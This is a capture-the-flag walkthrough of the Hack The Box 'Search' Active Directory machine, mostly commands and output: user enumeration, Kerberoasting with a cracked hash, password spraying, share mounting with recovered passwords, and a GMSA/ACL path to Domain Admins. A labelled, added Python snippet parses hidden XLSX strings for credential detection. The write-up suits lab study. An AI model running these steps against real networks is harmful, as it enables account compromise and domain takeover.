HTB - Search

Last updated 10 months ago

Machine Info

Search is a hard difficulty Windows machine that focuses on Active Directory enumeration and exploitation techniques. Foothold is obtained by finding exposed credentials on a web page, enumerating AD users, running a Kerberoast attack to obtain a crackable hash for a service account and spraying the password against a subset of the discovered accounts, which gives access to an SMB share where a protected XLSX file containing user data is found. Unprotecting the file leads to a second set of credentials, which gives access to another share where PKCS#12 certificates can be downloaded. After importing the certificates into a web browser, Windows PowerShell Web Access can be used to obtain an interactive shell on the system. Due to misconfigured ACLs, the user can retrieve the password of a group managed service account, which can change the password of an administrative user, resulting in high-privileged access to the system via wmiexec or psexec.

Enumeration

Scope

IP Address: 10.10.11.129

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
636/tcp  open  ldapssl          syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
8172/tcp open  unknown          syn-ack
9389/tcp open  adws             syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,80,88,135,139,443,445,636,3268,3269,8172,9389 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Search — Just Testing IIS
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-13 08:44:58Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
8172/tcp open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb2-time: 
|   date: 2024-07-13T08:45:49
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
* Open ports: 53,80,88,135,139,443,445,636,3268,3269,8172,9389
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - LDAP - KERBEROS - RPC - SMB
* Versions: IIS httpd 10.0
* Important Notes: Domain: search.htb - IIS 10.0 on 8172

SMB Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -N -L //$ip                       
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.129 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u '' -p '' --shares                            

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\: 
SMB         10.10.11.129    445    RESEARCH         [-] Error enumerating shares: STATUS_ACCESS_DENIED

RPC Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ rpcclient -U '%' $ip                     

rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

HTTP Enumeration

I found that both HTTP and HTTPS serve the same web app. The thing that stands out at first glance is the Our Team section, whose names could be used as usernames.

I created a wordlist of their names and ran username-anarchy on it to generate the different username formats

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ cat users.lst 
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ /opt/username-anarchy/username-anarchy -i users.lst | tee users.list

<snip>
keely.lyons
keelylyo
keellyon

<snip>
daxsantiago
dax.santiago
<snip>

Next I enumerate these candidate usernames against Kerberos to find out which of them are valid

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 ./users.list

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop

2024/07/13 04:57:07 >  Using KDC(s):
2024/07/13 04:57:07 >   10.10.11.129:88

2024/07/13 04:57:07 >  [+] VALID USERNAME:       keely.lyons@search.htb
2024/07/13 04:57:07 >  [+] VALID USERNAME:       dax.santiago@search.htb
2024/07/13 04:57:07 >  [+] VALID USERNAME:       sierra.frye@search.htb

I found one more user when using xato-net-10-million wordlist

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop

2024/07/13 05:13:59 >  Using KDC(s):
2024/07/13 05:13:59 >   10.10.11.129:88

2024/07/13 05:14:00 >  [+] VALID USERNAME:       administrator@search.htb
2024/07/13 05:14:01 >  [+] VALID USERNAME:       research@search.htb
2024/07/13 05:14:09 >  [+] VALID USERNAME:       Administrator@search.htb

I tried to get an AS-REP hash for any of these users, but that also failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetNPUsers search.htb/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User dax.santiago doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User keely.lyons doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sierra.frye doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User research doesn't have UF_DONT_REQUIRE_PREAUTH set

I don't like the following part, as it is very CTF-style

Foothold

Auth as hope.sharp

The web page says "Send Password to Hope Sharp", followed by IsolationIsKey!

Let's do the same thing we did before against that user

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ /opt/username-anarchy/username-anarchy -i hope.user| tee -a hope.wordlist
hope
hopesharp
hope.sharp
hopeshar
hopes
h.sharp
hsharp
shope
s.hope
sharph
sharp
sharp.h
sharp.hope
hs

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100  ./hope.wordlist

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/13 05:29:12 >  [+] VALID USERNAME:       hope.sharp@search.htb

One more user found; I will try to authenticate with it

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u hope.sharp  -p 'IsolationIsKey?'

SMB     10.10.11.129    445    RESEARCH   [+] search.htb\hope.sharp:IsolationIsKey? 

I will then begin to enumerate the domain with the credentials I found, starting with the SMB shares

I have Read access on several shares and Read, Write access on RedirectedFolders$

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u hope.sharp  -p 'IsolationIsKey?' -M spider_plus

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey? 
SPIDER_P... 10.10.11.129    445    RESEARCH         [*] Started spidering plus with option:
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]        DIR: ['print$']
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]       SIZE: 51200
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]     OUTPUT: /tmp/cme_spider_plus


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nano /tmp/cme_spider_plus/10.10.11.129.json 

    "CertEnroll": {
        "Research.search.htb_search-RESEARCH-CA.crt": {
            "atime_epoch": "2020-04-07 03:29:29",
            "ctime_epoch": "2020-04-07 03:29:29",
            "mtime_epoch": "2020-04-07 03:29:29",
            "size": "883 Bytes"
        },
        "nsrev_search-RESEARCH-CA.asp": {
            "atime_epoch": "2020-04-07 03:29:31",
            "ctime_epoch": "2020-04-07 03:29:31",
            "mtime_epoch": "2020-04-07 03:29:31",
            "size": "330 Bytes"
        },
        "search-RESEARCH-CA+.crl": {
            "atime_epoch": "2024-07-13 04:38:27",
            "ctime_epoch": "2020-04-07 03:29:32",
            "mtime_epoch": "2024-07-13 04:38:27",
            "size": "735 Bytes"
        },
        "search-RESEARCH-CA.crl": {
            "atime_epoch": "2024-07-13 04:38:25",
            "ctime_epoch": "2020-04-07 03:29:32",
            "mtime_epoch": "2024-07-13 04:38:25",
            "size": "931 Bytes"
        }
        
<snip>

        "sierra.frye/Desktop/user.txt": {
            "atime_epoch": "2021-11-17 19:55:27",
            "ctime_epoch": "2021-11-17 19:55:27",
            "mtime_epoch": "2021-11-17 20:18:26",
            "size": "33 Bytes"
        },
        "sierra.frye/user.txt": {
            "atime_epoch": "2021-11-17 19:55:27",
            "ctime_epoch": "2021-11-17 19:55:27",
            "mtime_epoch": "2021-11-17 20:01:45",
            "size": "33 Bytes

<snip>

        "search.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
            "atime_epoch": "2020-04-07 08:25:21",
            "ctime_epoch": "2020-04-07 08:25:14",
            "mtime_epoch": "2020-04-07 08:25:21",
            "size": "634 Bytes"
        },
        "search.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Services/Services.xml": {
            "atime_epoch": "2020-04-09 16:40:35",
            "ctime_epoch": "2020-04-09 16:39:42",
            "mtime_epoch": "2020-04-09 16:40:35",
            "size": "693 Bytes"

I will connect to the SMB server and download the files I found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -U hope.sharp \\\\$ip\\CertEnroll
Password for [WORKGROUP\hope.sharp]:

smb: \> ls
  .                                  Dc        0  Sat Jul 13 04:38:27 2024
  ..                                 Dc        0  Sat Jul 13 04:38:27 2024
  nsrev_search-RESEARCH-CA.asp       Ac      330  Tue Apr  7 03:29:31 2020
  Research.search.htb_search-RESEARCH-CA.crt     Ac      883  Tue Apr  7 03:29:29 2020
  search-RESEARCH-CA+.crl            Ac      735  Sat Jul 13 04:38:27 2024
  search-RESEARCH-CA.crl             Ac      931  Sat Jul 13 04:38:25 2024

smb: \> mget *

Do the same for Groups.xml and Services.xml. I didn't find anything in them anyway :)

The share RedirectedFolders$ is important and has several folders in it, so I will mount it on my Kali machine

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ sudo mount -t cifs "\\\\$ip\\RedirectedFolders$" ./mount -o "username=hope.sharp,password=IsolationIsKey?"
[sudo] password for kali: 
┌──(kali㉿kali)-[~/…/HTB/machines/Search/mount]
└─$ ls
Angie.Duffy   Cameron.Melendez  Cortez.Hickman  Edith.Walls     Reginald.Morton    abril.suarez   chanel.bell   edgar.jacobs  frederick.cuevas  jayla.roberts  santino.benjamin  trace.ryan
Antony.Russo  Claudia.Pugh      Eddie.Stevens   Jordan.Gregory  Savanah.Velazquez  belen.compton  dax.santiago  eve.galvan    hope.sharp        payton.harmon  sierra.frye

The folder sierra.frye contains the flag, but I couldn't read it.

When we have write access on a share, we could put a Shell Command File (.scf) on it, and if any user browses the share (they don't need to open the file), their machine will connect to my SMB server

I also tried to put .scf on the share but with no luck :(

Auth with web_svc

Running bloodhound-python to collect domain information while also looking for Kerberoastable users

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ bloodhound-python -u 'hope.sharp' -p 'IsolationIsKey?' -ns $ip -d search.htb -c all
<snip>

Since I have a valid username and password, I will check whether there is any Kerberoastable account

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -dc-ip $ip  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 08:59:11.329031  <never>               


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -dc-ip $ip  -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 08:59:11.329031  <never>               

[-] CCache file is not found. Skipping...
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$f3f3fd4fb0614c575add9b79b9965c17$<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt 

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$f3f3fd4fb0614c575add9b79b9965c17$6b816bedbacc2f81ecf9312be18bba19d3d028c0e5be49399fb677d22fdd04950e9faf80f78ad046e003a0ab373e3542fbdb7b3e55fe24b838f7b4d433837e3fa36600141084aedeb74cf4ba9b9b108235e3ab256e47fb37ae4c49380b72faeeb90366c857b1ff9fc8e7bf35d584a90b455dbaa113221485ec524a72fa02160ad3ef2081d629f476805598791cb6bc6de576c82ef96e62ba729523f1302bdad997fc727ad91e1e642f8d458acb62e512014f186fc41d642ef6d32fc5d375cec6989f135f9f9701bf4706cdb8185de61b4bd55144f2b755d84cd13113f43f224b1277dee3f6a770f908d05eaa8eb9897fa6f151c0dfcdaa3bfc473f6826ea72d9edbb1ec5710ec05378039cbb0469f30a22b1fb6d46fca8e9838beeca0879138ca8c01f1c34803d9c91b2b9d53f310d921c2245873496f51c19f6510a51ff7ce71136a7c48cbabf1e37d045d90f78b12d16f50f5df4144e4569fb35551d1d943d32d8e59d237e672587985a16c0a2744aa6571062f7a882f0a1502bd23f51198fb312399fa7b7caba16d67834c0099488100f569eb5f3cc30e2e7957d21c4948d44ba824657d87efa292197dbc12fc178ddcb4b24bd8dda75c5123346dc57fccc6373291985826d30be3e80c748eb296ab516a86acc16376dfd047e508159cdbd967babf8bad80a33824f92a772d5c18e69966fa9cc216c8e88fb4cfb050cfdeccaba80ea26b027fbad96dd03534aa8f7cdf60a310a45d81d1d9f596466617b5b0b2b4c6d3160483118359d68cc1a2e145ff47254ff53be12658db5eefa933533f6417607c865fac6fc70935719a2a8955c0dec44f3475dcdfc9b0ada516cb49fe136655ea63e71e757116cb4a775a4c13a535718cb631f68a2f013f873249526d7461fa5d61c46288624be1ec7e233f263f2cdfd5a1b81f89f82455261af2880dbe7bb19d3bea2bab1e00ec76bf7751e9d862554b6b0b8df7c03ca2159cab24c68c0c66ca42fb8615464d12115a83c1d73c936c95205ff6b9d93a283b21aabca8698dfad71310d9c84b259f9c7764b9676b4d01426c6ecdaaeabae269c4d4fde33b070eae96e0b7284861ddeeb237c0be49976a75e91c82be41c3e766467aa942b73e8bb2619bf5be4f10f5d018538633105ed817ebac5488d363e66c19e5a1848adfae25094860b7730c8cf4a631f514d1f04f298e85354a42fdba67b4dfc8a5da19efc185bb2348955bf04411088061a1e440a89f60fdbb80967da565d4b5e3ac722510f1529ec3df25bd06cb7e708db884a092e84c5ae9b9c0c31a70641816a7ed8bf9e190ae46058ae582db2b2808db2b5a962ade01e191a311e085
4f6f37fe99e60f3014526a3a6ff32a72c227bd2fc055c4dfde32f4250e003aedd2d7281e52e1f1a4396c8c655fd848c609017574254e2776135480dec99c67bfcf4645b6ac2e9c7a50e39802b40c82375d02cf885d36e8d:@3ONEmillionbaby

Session..........: hashcat
Status...........: Cracked

I created a wordlist of domain usernames from rpcclient, then password sprayed the password of web_svc against them, since I didn't find anything interesting about that user in BloodHound or in the shares.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ rpcclient -U 'web_svc%@3ONEmillionbaby' $ip -c "enumdomusers" | cut -d: -f2 | cut -d"[" -f2 | cut -d"]" -f1 | tee -a domain_users.list

<snip>
Amare.Serrano
Savanah.Knox
Frederick.Cuevas
Marshall.Skinner
Edgar.Jacobs
Elisha.Watts
Belen.Compton
Amari.Mora
Cadence.Conner
Katelynn.Costa
<snip>

Auth with Edgar.Jacobs

Got a hit with user Edgar.Jacobs

I looked at BloodHound to see if this user has any high privileges, but no luck, so I will enumerate the shares with that user instead.

  • On starting the spider_plus module with crackmapexec, I found that:

    • the helpdesk share is empty

    • RedirectedFolders$ has an interesting file at edgar.jacobs/Desktop/Phishing_Attempt.xlsx, which may contain valid credentials or important data

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u Edgar.Jacobs  -p '@3ONEmillionbaby' -M spider_plus
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\Edgar.Jacobs:@3ONEmillionbaby 
SPIDER_P... 10.10.11.129    445    RESEARCH         [*] Started spidering plus with option:
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]        DIR: ['print$']
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]       SIZE: 51200
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]     OUTPUT: /tmp/cme_spider_plus


    "helpdesk": {}
<snip>

    "RedirectedFolders$": {
        "edgar.jacobs/Desktop/Phishing_Attempt.xlsx": {
            "atime_epoch": "2020-08-10 06:30:05",
            "ctime_epoch": "2020-04-09 16:06:41",
            "mtime_epoch": "2020-08-10 06:30:05",
            "size": "22.59 KB"
        },
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -U Edgar.Jacobs \\\\$ip\\RedirectedFolders$
Password for [WORKGROUP\Edgar.Jacobs]:

smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx 

Privilege Escalation

Shell as sierra.frye

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ exiftool Phishing_Attempt.xlsx

<snip>
File Type                       : XLSX
File Type Extension             : xlsx
MIME Type                       : application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0xcc14a176
Zip Compressed Size             : 442
Zip Uncompressed Size           : 1996
Zip File Name                   : [Content_Types].xml
Last Modified By                : Edgar Jacobs
<snip>

The file is an XLSX file (a ZIP container); I will view it in Microsoft Excel

It has two sheets: Passwords 01082020 and Captured

Passwords 01082020

Captured

There was no interesting data in the two sheets, so I will unzip the file and explore its contents

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ unzip Phishing_Attempt.xlsx
Archive:  Phishing_Attempt.xlsx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: xl/workbook.xml         
  inflating: xl/_rels/workbook.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/worksheets/sheet2.xml  
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/sharedStrings.xml    
  inflating: xl/drawings/drawing1.xml  
  inflating: xl/charts/chart1.xml    
  inflating: xl/charts/style1.xml    
  inflating: xl/charts/colors1.xml   
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/worksheets/_rels/sheet2.xml.rels  
  inflating: xl/drawings/_rels/drawing1.xml.rels  
  inflating: xl/charts/_rels/chart1.xml.rels  
  inflating: xl/printerSettings/printerSettings1.bin  
  inflating: xl/printerSettings/printerSettings2.bin  
  inflating: xl/calcChain.xml        
  inflating: docProps/core.xml       
  inflating: docProps/app.xml 

The sharedStrings.xml file holds the cell text of the second sheet, but it contains more data than Excel showed me when I opened the XLSX.

The extra data is located between <t> and </t> tags.

┌──(kali㉿kali)-[~/…/HTB/machines/Search/xlsx]
└─$ cat xl/sharedStrings.xml             
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="49" uniqueCount="49"><si><t>firstname</t></si><si><t>lastname</t></si><si><t>password</t></si><si><t>Payton</t></si><si><t>Harmon</t></si><si><t>Cortez</t></si><si><t>Hickman</t></si><si><t>Bobby</t></si><si><t>Wolf</t></si><si><t>Margaret</t></si><si><t>Robinson</t></si><si><t>Costa</t></si><si><t>Scarlett</t></si><si><t>Parks</t></si><si><t>Eliezer</t></si><si><t>Jordan</t></si><si><t>Hunter</t></si><si><t>Kirby</t></si><si><t>Annabelle</t></si><si><t>Wells</t></si><si><t>Eve</t></si><si><t>Galvan</t></si><si><t>Jeramiah</t></si><si><t>Fritz</t></si><si><t>Abby</t></si><si><t>Gonzalez</t></si><si><t>Joy</t></si><si><t>Vincent</t></si><si><t>Sutton</t></si><si><t>Sierra</t></si><si><t>Frye</t></si><si><t>Username</t></si><si><t>Date</t></si><si><t>Captured Passwords</t></si><si><t>IT ChangeOver Keely Lyons Started</t></si><si><t>//51+mountain+DEAR+noise+83//</t></si><si><t>++47|building|WARSAW|gave|60++</t></si><si><t>!!05_goes_SEVEN_offer_83!!</t></si><si><t>~~27%when%VILLAGE%full%00~~</t></si><si><t>==95~pass~QUIET~austria~77==</t></si><si><t>//61!banker!FANCY!measure!25//</t></si><si><t>??40:student:MAYOR:been:66??</t></si><si><t>&amp;&amp;75:major:RADIO:state:93&amp;&amp;</t></si><si><t>**30*venus*BALL*office*42**</t></si><si><t>;;36!cried!INDIA!year!50;;</t></si><si><t>..10-time-TALK-proud-66..</t></si><si><t>??47^before^WORLD^surprise^91??</t></si><si><t>**24&amp;moment&amp;BRAZIL&amp;members&amp;66**</t></si><si><t>$$49=wide=STRAIGHT=jordan=28$$18</t></si></sst> 
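The reason the extra column shows up here is that an XLSX workbook stores every cell string in one shared string table, xl/sharedStrings.xml, regardless of whether the sheet hides, protects or narrows the column that references it. The block below is an added example, not code from this write-up, that reads that part straight out of the ZIP container, the same thing unzip and cat did above but as a reusable parser. It builds a constructed minimal workbook with made-up strings (including an XML-escaped entry and a rich-text cell split into <r> runs, as Excel writes formatted cells), and adds a DLP-style check that flags workbooks carrying a "password" column header, the kind of scan that finds credential spreadsheets on file shares before a hidden column leaks them.

```python
# Added example (not from the original write-up): read xl/sharedStrings.xml
# straight out of the XLSX zip container. This returns every cell string in the
# workbook, including text in hidden or protected columns. The workbook built
# here is a constructed minimal sample and the strings in it are made up.
import io
import zipfile
import xml.etree.ElementTree as ET

SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

# Constructed sharedStrings.xml: plain <t> entries, an XML-escaped entry (&amp;),
# and one rich-text entry split into <r> runs.
SAMPLE_SHARED_STRINGS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<sst xmlns="{SML_NS}" count="5" uniqueCount="5">'
    "<si><t>firstname</t></si>"
    "<si><t>password</t></si>"
    "<si><t>Example</t></si>"
    "<si><t>&amp;&amp;00:sample:WORD:value:00&amp;&amp;</t></si>"
    "<si><r><t>rich </t></r><r><t>text</t></r></si>"
    "</sst>"
)


def build_sample_xlsx():
    """Return bytes of a minimal zip that mimics the XLSX layout (only the part we parse)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # placeholder, not a full workbook
        zf.writestr("xl/sharedStrings.xml", SAMPLE_SHARED_STRINGS)
    return buf.getvalue()


def extract_shared_strings(xlsx_bytes):
    """Every string in the shared string table, in index order; [] if the part is absent."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        if "xl/sharedStrings.xml" not in zf.namelist():
            return []  # workbook with only inline strings or numbers
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    strings = []
    for si in root.findall(f"{{{SML_NS}}}si"):
        # Join all <t> text under the item: one for plain cells, several for rich-text runs.
        # ElementTree already decodes entities such as &amp; for us.
        strings.append("".join(t.text or "" for t in si.iter(f"{{{SML_NS}}}t")))
    return strings


def has_password_header(xlsx_bytes):
    """True if any cell text is a typical credential column header (DLP-style check)."""
    headers = {"password", "passwd", "pwd", "captured passwords"}
    return any(s.strip().lower() in headers for s in extract_shared_strings(xlsx_bytes))


if __name__ == "__main__":
    sample = build_sample_xlsx()
    for i, s in enumerate(extract_shared_strings(sample)):
        print(i, repr(s))
    print("credential sheet?", has_password_header(sample))
```

Sheet protection and hidden columns in Office files are presentation settings, not access controls; the only protection that keeps the strings out of this table is workbook-level encryption with a password, which replaces the ZIP container with an OLE-wrapped encrypted package.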

I created a wordlist from these records and brute-forced user sierra.frye with it, and I got a hit

I mounted the share RedirectedFolders$ as user sierra.frye

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ sudo mount -t cifs "\\\\$ip\\Redirectedfolders$" ./mount -o 'username=sierra.frye,password=$$49=wide=STRAIGHT=jordan=28$$18'

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ cd mount/sierra.frye  

┌──(kali㉿kali)-[~/…/machines/Search/mount/sierra.frye]
└─$ tree            
.
├── Desktop
│   ├── $RECYCLE.BIN
│   │   └── desktop.ini
│   ├── @rce.scf
│   ├── Microsoft Edge.lnk
│   ├── desktop.ini
│   └── user.txt
├── Documents
│   ├── $RECYCLE.BIN
│   │   └── desktop.ini
│   └── desktop.ini
├── Downloads
│   ├── $RECYCLE.BIN
│   │   └── desktop.ini
│   ├── Backups
│   │   ├── search-RESEARCH-CA.p12
│   │   └── staff.pfx
│   └── desktop.ini
└── user.txt
  • There are two new files I didn't see before under Backups folder search-RESEARCH-CA.p12 & staff.pfx

These two files can be imported into your browser to access the web app on port 443, which leads to the PowerShell Web Access console, but I took a different path :)

Get the flag

┌──(kali㉿kali)-[~/…/machines/Search/mount/sierra.frye]
└─$ cat user.txt 
07129b5634467dbe9cxxxxxxxxxx

User Flag: 07129b5634467dbxxxxxxxxxxx

Shell as Administrator

  • User sierra.frye can PSRemote to the machine, as it is a member of BIRMINGHAM-ITSEC, which is a member of ITSEC

  • ITSEC has the privilege to read the GMSA password

  • BIR-ADFS-GMSA$ has GenericAll rights on user Tristan.Davies, who is a member of the Domain Admins group

So if we can take over the sierra.frye user, we can reach Domain Admins through the attack path above

More about GMSA from bloodhound

Read the GMSA password with gMSADumper.py or NetExec

